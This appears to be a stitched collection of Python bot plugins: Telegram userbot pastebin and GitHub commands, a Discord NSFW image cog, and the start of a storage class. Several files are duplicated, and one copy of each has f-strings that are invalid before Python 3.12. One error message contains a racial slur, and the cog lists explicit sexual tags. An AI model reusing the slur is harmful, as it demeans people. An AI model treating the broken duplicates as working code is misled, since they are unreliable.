os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.npaste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
# message += m.decode("UTF-8") + "\r\n"
message += m.decode("UTF-8")
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.npaste <long text to include>`"
py_file = ""
if downloaded_file_name.endswith(".py"):
py_file += ".py"
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}{py_file}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
else:
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
@borg.on(admin_cmd(pattern="iffuci ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.iffuci <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.iffuci <long text to include>`"
url = "https://www.iffuci.tk/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://iffuci.tk/{r["key"]}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://iffuci.tk/v/{r["key"]}"
await event.edit("code is pasted to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("code is pasted to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(pattern="paster ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
reply_message = await event.get_reply_message()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r["key"]}"
chat = "@chotamreaderbot"
if r["isUrl"]:
nurl = f"https://del.dog/v/{r["key"]}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
#This module is modded by @ViperAdnan #KeepCredit
else:
await event.edit("**Making instant view...**")
async with event.client.conversation(chat) as conv:
try:
response = conv.wait_event(events.NewMessage(incoming=True,from_users=272572121))
await event.client.send_message(chat, url)
response = await response
except YouBlockedUserError:
await event.reply("```Please unblock me (@chotamreaderbot) u Nigga```")
return
await event.delete()
await event.client.send_message(event.chat_id, response.message, reply_to=reply_message)
CMD_HELP.update({
"pastebin":
".paste <text/reply>\
\nUsage: Create a paste or a shortened url using dogbin (https://del.dog/)\
\n\n.getpaste\
\nUsage: Gets the content of a paste or shortened url from dogbin (https://del.dog/)\
\n\n.npaste <text/reply>\
\nUsage: Create a paste or a shortened url using nekobin (https://nekobin.com)\
\n\n.iffuci <text/reply>\
\nUsage: Create a paste or a shortened url using iffuci (https://www.iffuci.tk)\
\n\n.paster <text/reply>\
\nUsage: Create a instant view or a paste it in telegraph file\
"
})
| """IX.IO pastebin like site
Syntax: .paste
Syntax: .npaste
Syntax: .paster
Syntax: .iffuci
"""
import logging
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
level=logging.WARNING)
import asyncio
import os
from datetime import datetime
import requests
from telethon import events
from userbot.utils import admin_cmd
from userbot.uniborgConfig import Config
from telethon.errors.rpcerrorlist import YouBlockedUserError
from requests import exceptions, get, post
def progress(current, total):
logger.info("Downloaded {} of {}\nCompleted {}".format(current, total, (current / total) * 100))
from userbot import CMD_HELP, LOGS, TEMP_DOWNLOAD_DIRECTORY
DOGBIN_URL = "https://del.dog/"
BOTLOG_CHATID = Config.PRIVATE_GROUP_BOT_API_ID
BOTLOG = True
@borg.on(admin_cmd(pattern="paste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r['key']}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://del.dog/v/{r['key']}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("Dogged to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(outgoing=True, pattern="getpaste(?: |$)(.*)"))
async def get_dogbin_content(dog_url):
""" For .getpaste command, fetches the content of a dogbin URL. """
textx = await dog_url.get_reply_message()
message = dog_url.pattern_match.group(1)
await dog_url.edit("`Getting dogbin content...`")
if textx:
message = str(textx.message)
format_normal = f'{DOGBIN_URL}'
format_view = f'{DOGBIN_URL}v/'
if message.startswith(format_view):
message = message[len(format_view):]
elif message.startswith(format_normal):
message = message[len(format_normal):]
elif message.startswith("del.dog/"):
message = message[len("del.dog/"):]
else:
await dog_url.edit("`Is that even a dogbin url?`")
return
resp = get(f'{DOGBIN_URL}raw/{message}')
try:
resp.raise_for_status()
except exceptions.HTTPError as HTTPErr:
await dog_url.edit(
"Request returned an unsuccessful status code.\n\n" + str(HTTPErr))
return
except exceptions.Timeout as TimeoutErr:
await dog_url.edit("Request timed out." + str(TimeoutErr))
return
except exceptions.TooManyRedirects as RedirectsErr:
await dog_url.edit(
"Request exceeded the configured number of maximum redirections." +
str(RedirectsErr))
return
reply_text = "`Fetched dogbin URL content successfully!`\n\n`Content:` " + resp.text
await dog_url.edit(reply_text)
if BOTLOG:
await dog_url.client.send_message(
BOTLOG_CHATID,
"Get dogbin content query was executed successfully",
)
@borg.on(admin_cmd(pattern="npaste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.npaste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
# message += m.decode("UTF-8") + "\r\n"
message += m.decode("UTF-8")
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.npaste <long text to include>`"
py_file = ""
if downloaded_file_name.endswith(".py"):
py_file += ".py"
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}{py_file}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
else:
data = message
key = requests.post('https://nekobin.com/api/documents', json={"content": data}).json().get('result').get('key')
url = f'https://nekobin.com/{key}'
reply_text = f'Nekofied to *Nekobin* : {url}'
await event.edit(reply_text)
@borg.on(admin_cmd(pattern="iffuci ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.iffuci <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.iffuci <long text to include>`"
url = "https://www.iffuci.tk/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://iffuci.tk/{r['key']}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://iffuci.tk/v/{r['key']}"
await event.edit("code is pasted to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("code is pasted to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(pattern="paster ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
reply_message = await event.get_reply_message()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r['key']}"
chat = "@chotamreaderbot"
if r["isUrl"]:
nurl = f"https://del.dog/v/{r['key']}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
#This module is modded by @ViperAdnan #KeepCredit
else:
await event.edit("**Making instant view...**")
async with event.client.conversation(chat) as conv:
try:
response = conv.wait_event(events.NewMessage(incoming=True,from_users=272572121))
await event.client.send_message(chat, url)
response = await response
except YouBlockedUserError:
await event.reply("```Please unblock me (@chotamreaderbot) u Nigga```")
return
await event.delete()
await event.client.send_message(event.chat_id, response.message, reply_to=reply_message)
CMD_HELP.update({
"pastebin":
".paste <text/reply>\
\nUsage: Create a paste or a shortened url using dogbin (https://del.dog/)\
\n\n.getpaste\
\nUsage: Gets the content of a paste or shortened url from dogbin (https://del.dog/)\
\n\n.npaste <text/reply>\
\nUsage: Create a paste or a shortened url using nekobin (https://nekobin.com)\
\n\n.iffuci <text/reply>\
\nUsage: Create a paste or a shortened url using iffuci (https://www.iffuci.tk)\
\n\n.paster <text/reply>\
\nUsage: Create a instant view or a paste it in telegraph file\
"
})
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import os
import time
from datetime import datetime
import aiohttp
from github import Github
from userbot import CMD_HELP, GIT_REPO_NAME, GITHUB_ACCESS_TOKEN, bot
from userbot.events import register
GIT_TEMP_DIR = "./userbot/temp/"
@register(outgoing=True, disable_errors=True, pattern="^.git(?: |$)(.*)")
async def github(event):
username = event.pattern_match.group(1)
URL = f"https://api.github.com/users/{username}"
await event.get_chat()
async with aiohttp.ClientSession() as session, session.get(URL) as request:
if request.status == 404:
return await event.reply(f"`{username} not found`")
result = await request.json()
url = result.get("html_url", None)
name = result.get("name", None)
company = result.get("company", None)
bio = result.get("bio", None)
created_at = result.get("created_at", "Not Found")
REPLY = (
f"GitHub Info for `{username}`\n"
f"Username: `{name}`\n"
f"Bio: `{bio}`\n"
f"URL: {url}\n"
f"Company: `{company}`\n"
f"Created at: `{created_at}`\n"
f"More info : [Here](https://api.github.com/users/{username}/events/public)")
if not result.get("repos_url", None):
return await event.edit(REPLY)
async with session.get(result.get("repos_url", None)) as request:
result = request.json
if request.status == 404:
return await event.edit(REPLY)
result = await request.json()
REPLY += "\nRepos:\n"
for nr in range(len(result)):
REPLY += f"[{result[nr].get("name", None)}]({result[nr].get("html_url", None)})\n"
await event.edit(REPLY)
@register(outgoing=True, pattern="^.commit(?: |$)(.*)")
async def download(event):
if event.fwd_from:
return
if GITHUB_ACCESS_TOKEN is None:
await event.edit("`Please ADD Proper Access Token from github.com`")
return
if GIT_REPO_NAME is None:
await event.edit("`Please ADD Proper Github Repo Name of your userbot`"
)
return
mone = await event.reply("Processing ...")
if not os.path.isdir(GIT_TEMP_DIR):
os.makedirs(GIT_TEMP_DIR)
start = datetime.now()
reply_message = await event.get_reply_message()
try:
time.time()
print("Downloading to TEMP directory")
downloaded_file_name = await bot.download_media(
reply_message.media, GIT_TEMP_DIR)
except Exception as e:
await mone.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.delete()
await mone.edit("Downloaded to `{}` in {} seconds.".format(
downloaded_file_name, ms))
await mone.edit("Committing to Github....")
await git_commit(downloaded_file_name, mone)
async def git_commit(file_name, mone):
content_list = []
access_token = GITHUB_ACCESS_TOKEN
g = Github(access_token)
file = open(file_name, "r", encoding="utf-8")
commit_data = file.read()
repo = g.get_repo(GIT_REPO_NAME)
print(repo.name)
create_file = True
contents = repo.get_contents("")
for content_file in contents:
content_list.append(str(content_file))
print(content_file)
for i in content_list:
create_file = True
if i == 'ContentFile(path="' + file_name + '")':
return await mone.edit("`File Already Exists`")
file_name = "userbot/modules/" + file_name
if create_file is True:
file_name = file_name.replace("./userbot/temp/", "")
print(file_name)
try:
repo.create_file(file_name,
"Uploaded New Plugin",
commit_data,
branch="sql-extended")
print("Committed File")
ccess = GIT_REPO_NAME
ccess = ccess.strip()
await mone.edit(
f"`Commited On Your Github Repo`\n\n[Your Modules](https://github.com/{ccess}/tree/sql-extended/userbot/modules/)"
)
except BaseException:
print("Cannot Create Plugin")
await mone.edit("Cannot Upload Plugin")
else:
return await mone.edit("`Committed Suicide`")
CMD_HELP.update({
"github":
">`.git` <username>"
"\nUsage: Like .whois but for GitHub usernames."
"\n\n>`.commit` <reply file>"
"\nUsage: GITHUB File Uploader Plugin for userbot. Heroku Automation should be Enabled."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
import os
import time
from datetime import datetime
import aiohttp
from github import Github
from userbot import CMD_HELP, GIT_REPO_NAME, GITHUB_ACCESS_TOKEN, bot
from userbot.events import register
GIT_TEMP_DIR = "./userbot/temp/"
@register(outgoing=True, disable_errors=True, pattern="^.git(?: |$)(.*)")
async def github(event):
username = event.pattern_match.group(1)
URL = f"https://api.github.com/users/{username}"
await event.get_chat()
async with aiohttp.ClientSession() as session, session.get(URL) as request:
if request.status == 404:
return await event.reply(f"`{username} not found`")
result = await request.json()
url = result.get("html_url", None)
name = result.get("name", None)
company = result.get("company", None)
bio = result.get("bio", None)
created_at = result.get("created_at", "Not Found")
REPLY = (
f"GitHub Info for `{username}`\n"
f"Username: `{name}`\n"
f"Bio: `{bio}`\n"
f"URL: {url}\n"
f"Company: `{company}`\n"
f"Created at: `{created_at}`\n"
f"More info : [Here](https://api.github.com/users/{username}/events/public)")
if not result.get("repos_url", None):
return await event.edit(REPLY)
async with session.get(result.get("repos_url", None)) as request:
result = request.json
if request.status == 404:
return await event.edit(REPLY)
result = await request.json()
REPLY += "\nRepos:\n"
for nr in range(len(result)):
REPLY += f"[{result[nr].get('name', None)}]({result[nr].get('html_url', None)})\n"
await event.edit(REPLY)
@register(outgoing=True, pattern="^.commit(?: |$)(.*)")
async def download(event):
if event.fwd_from:
return
if GITHUB_ACCESS_TOKEN is None:
await event.edit("`Please ADD Proper Access Token from github.com`")
return
if GIT_REPO_NAME is None:
await event.edit("`Please ADD Proper Github Repo Name of your userbot`"
)
return
mone = await event.reply("Processing ...")
if not os.path.isdir(GIT_TEMP_DIR):
os.makedirs(GIT_TEMP_DIR)
start = datetime.now()
reply_message = await event.get_reply_message()
try:
time.time()
print("Downloading to TEMP directory")
downloaded_file_name = await bot.download_media(
reply_message.media, GIT_TEMP_DIR)
except Exception as e:
await mone.edit(str(e))
else:
end = datetime.now()
ms = (end - start).seconds
await event.delete()
await mone.edit("Downloaded to `{}` in {} seconds.".format(
downloaded_file_name, ms))
await mone.edit("Committing to Github....")
await git_commit(downloaded_file_name, mone)
async def git_commit(file_name, mone):
content_list = []
access_token = GITHUB_ACCESS_TOKEN
g = Github(access_token)
file = open(file_name, "r", encoding="utf-8")
commit_data = file.read()
repo = g.get_repo(GIT_REPO_NAME)
print(repo.name)
create_file = True
contents = repo.get_contents("")
for content_file in contents:
content_list.append(str(content_file))
print(content_file)
for i in content_list:
create_file = True
if i == 'ContentFile(path="' + file_name + '")':
return await mone.edit("`File Already Exists`")
file_name = "userbot/modules/" + file_name
if create_file is True:
file_name = file_name.replace("./userbot/temp/", "")
print(file_name)
try:
repo.create_file(file_name,
"Uploaded New Plugin",
commit_data,
branch="sql-extended")
print("Committed File")
ccess = GIT_REPO_NAME
ccess = ccess.strip()
await mone.edit(
f"`Commited On Your Github Repo`\n\n[Your Modules](https://github.com/{ccess}/tree/sql-extended/userbot/modules/)"
)
except BaseException:
print("Cannot Create Plugin")
await mone.edit("Cannot Upload Plugin")
else:
return await mone.edit("`Committed Suicide`")
CMD_HELP.update({
"github":
">`.git` <username>"
"\nUsage: Like .whois but for GitHub usernames."
"\n\n>`.commit` <reply file>"
"\nUsage: GITHUB File Uploader Plugin for userbot. Heroku Automation should be Enabled."
})
|
import discord
from checks.checks import *
from random import choice
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
class NSFW:
"""NSFW Commands 🔞"""
def __init__(self, bot):
self.bot = bot
self.thumbnail = "https://i.imgur.com/ivmKTvu.png"
self.tags = (
"feet",
"yuri",
"trap",
"futanari",
"hololewd",
"lewdkemo",
"solog",
"feetg",
"cum",
"erokemo",
"les",
"wallpaper",
"lewdk",
"ngif",
"meow",
"tickle",
"lewd",
"feed",
"gecg",
"eroyuri",
"eron",
"cum_jpg",
"bj",
"nsfw_neko_gif",
"solo",
"kemonomimi",
"nsfw_avatar",
"gasm",
"poke",
"anal",
"slap",
"hentai",
"avatar",
"erofeet",
"holo",
"keta",
"blowjob",
"pussy",
"tits",
"holoero",
"lizard",
"pussy_jpg",
"pwankg",
"classic",
"kuni",
"waifu",
"pat",
"8ball",
"kiss",
"femdom",
"neko",
"spank",
"cuddle",
"erok",
"fox_girl",
"boobs",
"Random_hentai_gif",
"smallboobs",
"hug",
"ero",
)
@nsfw()
@commands.command(
name="neko",
aliases=(
"catgirl",
"hentai"
)
)
@commands.cooldown(
1.0, 5.0, commands.BucketType.user
)
async def _neko(self, ctx, *, tag: str.lower = None):
"""
Gives you random neko picture. Channel must be NSFW to use this command. Leave the tag field empty to randomize neko.
---
Tags are: feet, yuri, trap, futanari, hololewd, lewdkemo, solog, feetg,
cum, erokemo, les, wallpaper, lewdk, ngif, meow, tickle, lewd, feed, gecg,
eroyuri, eron, cum_jpg, bj, nsfw_neko_gif, solo, kemonomimi, nsfw_avatar,
gasm, poke, anal, slap, hentai, avatar, erofeet, holo, keta, blowjob, pussy,
tits, holoero, lizard, pussy_jpg, pwankg, classic, kuni, waifu, pat, 8ball, kiss,
femdom, neko, spank, cuddle, erok, fox_girl, boobs, Random_hentai_gif, smallboobs,
hug, ero
"""
try:
if tag is None:
tag = choice(
self.tags
)
if tag == "random_hentai_gif":
tag = tag.capitalize()
async with self.bot.session.get(
f"https://nekos.life/api/v2/img/{tag}"
) as resp:
data = await resp.json()
embedneko = discord.Embed(
color=self.bot.color,
title=f"Neko :3 - {tag}",
timestamp=ctx.message.created_at,
)
embedneko.set_image(url=f'{data.get('url')}')
embedneko.set_footer(
text=f"Requested by: {ctx.author}",
icon_url=ctx.author.avatar_url)
await ctx.send(embed=embedneko)
except Exception as exc:
await self.bot.error(
ctx = ctx,
exc = exc,
)
@nsfw()
@commands.command(
aliases=(
"urb",
"ud",
"urban"
)
)
@commands.cooldown(
1.0, 10.0, commands.BucketType.user
)
async def urbandictionary(self, ctx, *, urbanword):
"""
Looks up for word in Urban Dictionary
For example, @Astonish ud cat will give you definition and more of word 'cat'
"""
try:
async with self.bot.session.get(
f"http://api.urbandictionary.com/v0/define?term={urbanword}"
) as resp:
data = await resp.json()
try:
data["list"][0].get("word")
except Exception as exc:
await self.bot.error(
ctx = ctx,
exc = exc,
)
else:
async with self.bot.session.get(
f"http://api.urbandictionary.com/v0/define?term={urbanword}"
) as resp:
data = await resp.json()
definition = data["list"][0].get("definition")
example = data["list"][0].get("example")
if definition == "":
definition = "No definition(s)."
elif example == "":
example = "No example(s)."
try:
if len(definition) >= 2000:
raise Exception("The definition is too long.")
else:
embed = discord.Embed(color=self.bot.color)
embed.add_field(
name="**:baby_bottle: Definition**",
value=definition,
inline=True,
)
embed.add_field(
name="**:link: Permalink**",
value=f'**[➤ Click Me!]({data['list'][0].get('permalink')})**',
inline=True,
)
embed.add_field(
name="**:notebook_with_decorative_cover: Word by**",
value=f'**{data['list'][0].get('author')}**',
inline=True,
)
embed.add_field(
name="**:pen_ballpoint: Written on**",
value=f'**{data['list'][0].get('written_on')}**',
inline=True,
)
embed.add_field(
name="**:star: Rating**",
value=f':thumbsup: **{data['list'][0].get('thumbs_up')}**\n:thumbsdown: **{data['list'][0].get('thumbs_down')}**',
inline=True,
)
embed.set_thumbnail(
url=ctx.author.avatar_url,
)
await ctx.send(
embed=embed,
)
except Exception as exc:
await ctx.send(
f"{self.bot.tick(False)} | **Maybe, the definition is too long**",
delete_after=5,
)
except Exception as exc:
await ctx.send(
f"{self.bot.tick(False)} | **Error or no results found for your query**",
delete_after=5,
)
def setup(bot):
bot.add_cog(NSFW(bot))
| import discord
from checks.checks import *
from random import choice
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
class NSFW:
"""NSFW Commands 🔞"""
def __init__(self, bot):
self.bot = bot
self.thumbnail = "https://i.imgur.com/ivmKTvu.png"
self.tags = (
"feet",
"yuri",
"trap",
"futanari",
"hololewd",
"lewdkemo",
"solog",
"feetg",
"cum",
"erokemo",
"les",
"wallpaper",
"lewdk",
"ngif",
"meow",
"tickle",
"lewd",
"feed",
"gecg",
"eroyuri",
"eron",
"cum_jpg",
"bj",
"nsfw_neko_gif",
"solo",
"kemonomimi",
"nsfw_avatar",
"gasm",
"poke",
"anal",
"slap",
"hentai",
"avatar",
"erofeet",
"holo",
"keta",
"blowjob",
"pussy",
"tits",
"holoero",
"lizard",
"pussy_jpg",
"pwankg",
"classic",
"kuni",
"waifu",
"pat",
"8ball",
"kiss",
"femdom",
"neko",
"spank",
"cuddle",
"erok",
"fox_girl",
"boobs",
"Random_hentai_gif",
"smallboobs",
"hug",
"ero",
)
@nsfw()
@commands.command(
name="neko",
aliases=(
"catgirl",
"hentai"
)
)
@commands.cooldown(
1.0, 5.0, commands.BucketType.user
)
async def _neko(self, ctx, *, tag: str.lower = None):
"""
Gives you random neko picture. Channel must be NSFW to use this command. Leave the tag field empty to randomize neko.
---
Tags are: feet, yuri, trap, futanari, hololewd, lewdkemo, solog, feetg,
cum, erokemo, les, wallpaper, lewdk, ngif, meow, tickle, lewd, feed, gecg,
eroyuri, eron, cum_jpg, bj, nsfw_neko_gif, solo, kemonomimi, nsfw_avatar,
gasm, poke, anal, slap, hentai, avatar, erofeet, holo, keta, blowjob, pussy,
tits, holoero, lizard, pussy_jpg, pwankg, classic, kuni, waifu, pat, 8ball, kiss,
femdom, neko, spank, cuddle, erok, fox_girl, boobs, Random_hentai_gif, smallboobs,
hug, ero
"""
try:
if tag is None:
tag = choice(
self.tags
)
if tag == "random_hentai_gif":
tag = tag.capitalize()
async with self.bot.session.get(
f"https://nekos.life/api/v2/img/{tag}"
) as resp:
data = await resp.json()
embedneko = discord.Embed(
color=self.bot.color,
title=f"Neko :3 - {tag}",
timestamp=ctx.message.created_at,
)
embedneko.set_image(url=f'{data.get("url")}')
embedneko.set_footer(
text=f"Requested by: {ctx.author}",
icon_url=ctx.author.avatar_url)
await ctx.send(embed=embedneko)
except Exception as exc:
await self.bot.error(
ctx = ctx,
exc = exc,
)
@nsfw()
@commands.command(
aliases=(
"urb",
"ud",
"urban"
)
)
@commands.cooldown(
1.0, 10.0, commands.BucketType.user
)
async def urbandictionary(self, ctx, *, urbanword):
"""
Looks up for word in Urban Dictionary
For example, @Astonish ud cat will give you definition and more of word 'cat'
"""
try:
async with self.bot.session.get(
f"http://api.urbandictionary.com/v0/define?term={urbanword}"
) as resp:
data = await resp.json()
try:
data["list"][0].get("word")
except Exception as exc:
await self.bot.error(
ctx = ctx,
exc = exc,
)
else:
async with self.bot.session.get(
f"http://api.urbandictionary.com/v0/define?term={urbanword}"
) as resp:
data = await resp.json()
definition = data["list"][0].get("definition")
example = data["list"][0].get("example")
if definition == "":
definition = "No definition(s)."
elif example == "":
example = "No example(s)."
try:
if len(definition) >= 2000:
raise Exception("The definition is too long.")
else:
embed = discord.Embed(color=self.bot.color)
embed.add_field(
name="**:baby_bottle: Definition**",
value=definition,
inline=True,
)
embed.add_field(
name="**:link: Permalink**",
value=f'**[➤ Click Me!]({data["list"][0].get("permalink")})**',
inline=True,
)
embed.add_field(
name="**:notebook_with_decorative_cover: Word by**",
value=f'**{data["list"][0].get("author")}**',
inline=True,
)
embed.add_field(
name="**:pen_ballpoint: Written on**",
value=f'**{data["list"][0].get("written_on")}**',
inline=True,
)
embed.add_field(
name="**:star: Rating**",
value=f':thumbsup: **{data["list"][0].get("thumbs_up")}**\n:thumbsdown: **{data["list"][0].get("thumbs_down")}**',
inline=True,
)
embed.set_thumbnail(
url=ctx.author.avatar_url,
)
await ctx.send(
embed=embed,
)
except Exception as exc:
await ctx.send(
f"{self.bot.tick(False)} | **Maybe, the definition is too long**",
delete_after=5,
)
except Exception as exc:
await ctx.send(
f"{self.bot.tick(False)} | **Error or no results found for your query**",
delete_after=5,
)
def setup(bot):
bot.add_cog(NSFW(bot))
|
# space.py
from __future__ import annotations
import abc
import json
import os
import re
import time
from typing import TYPE_CHECKING, Any, Optional
from typing import Dict, FrozenSet, List, OrderedDict
import discord
from .command import Command, CommandAlias, CommandSimple
if TYPE_CHECKING:
from .deepbluesky import DeepBlueSky
class Space(abc.ABC):
# pylint: disable=function-redefined
def __init__(self, client: DeepBlueSky, space_type: str, base_id: int):
self.client: DeepBlueSky = client
self.base_id: int = base_id
self.custom_command_dict: Dict[str, Command] = OrderedDict([])
self.crtime: int = int(time.time())
self.mtime: int = int(time.time())
self.wikitext: Optional[bool] = None
self.command_prefix: Optional[str] = None
self.space_type: str = space_type
self.space_id: str = f'{space_type}_{base_id}'
def __str__(self) -> str:
return self.space_id
def __eq__(self, other) -> bool:
if not other:
return False
if id(self) == id(other):
return True
return self.space_id == other.space_id
def __hash__(self) -> int:
return hash((type(self), self.space_id))
def get_all_properties(self) -> Dict[str, Any]:
return {attr: getattr(self, attr) for attr in list(self.client.default_properties.keys()) + ['crtime', 'mtime']}
def save(self, update_mtime: bool = True) -> bool:
if update_mtime:
self.mtime = int(time.time())
space_properties = self.get_all_properties()
dirname = f'storage/{self.space_id}'
try:
os.makedirs(dirname, mode=0o755, exist_ok=True)
with open(f'{dirname}/space.json', 'w', encoding='UTF-8') as json_file:
json.dump(space_properties, json_file)
except IOError:
self.client.logger.exception(f'Unable to save space: {self.space_id}')
return False
return True
def save_command(self, command_name: str, update_mtime: bool = True) -> bool:
dirname=f'storage/{self.space_id}/commands'
command_json_fname = f'{dirname}/{command_name}.json'
try:
os.makedirs(dirname, mode=0o755, exist_ok=True)
if command_name in self.custom_command_dict:
command = self.custom_command_dict[command_name]
command.modification_time = int(time.time())
with open(command_json_fname, 'w', encoding='UTF-8') as json_file:
json.dump(command.get_dict(), json_file)
elif os.path.isfile(command_json_fname):
os.remove(command_json_fname)
return True
except IOError:
self.client.logger.exception(f'Unable to save command in space: {self.space_id}')
return False
def load_properties(self, property_dict: Dict[str, Any]):
for attr in self.client.default_properties.keys():
setattr(self, attr, property_dict.get(attr, None))
# this mangles space_id so we re-set it
self.space_id = f'{self.space_type}_{self.base_id}'
for attr in ['crtime', 'mtime']:
setattr(self, attr, property_dict.get(attr, int(time.time())))
def load_command(self, command_dict: Dict[str, Any]) -> bool:
# python 3.10: use patterns
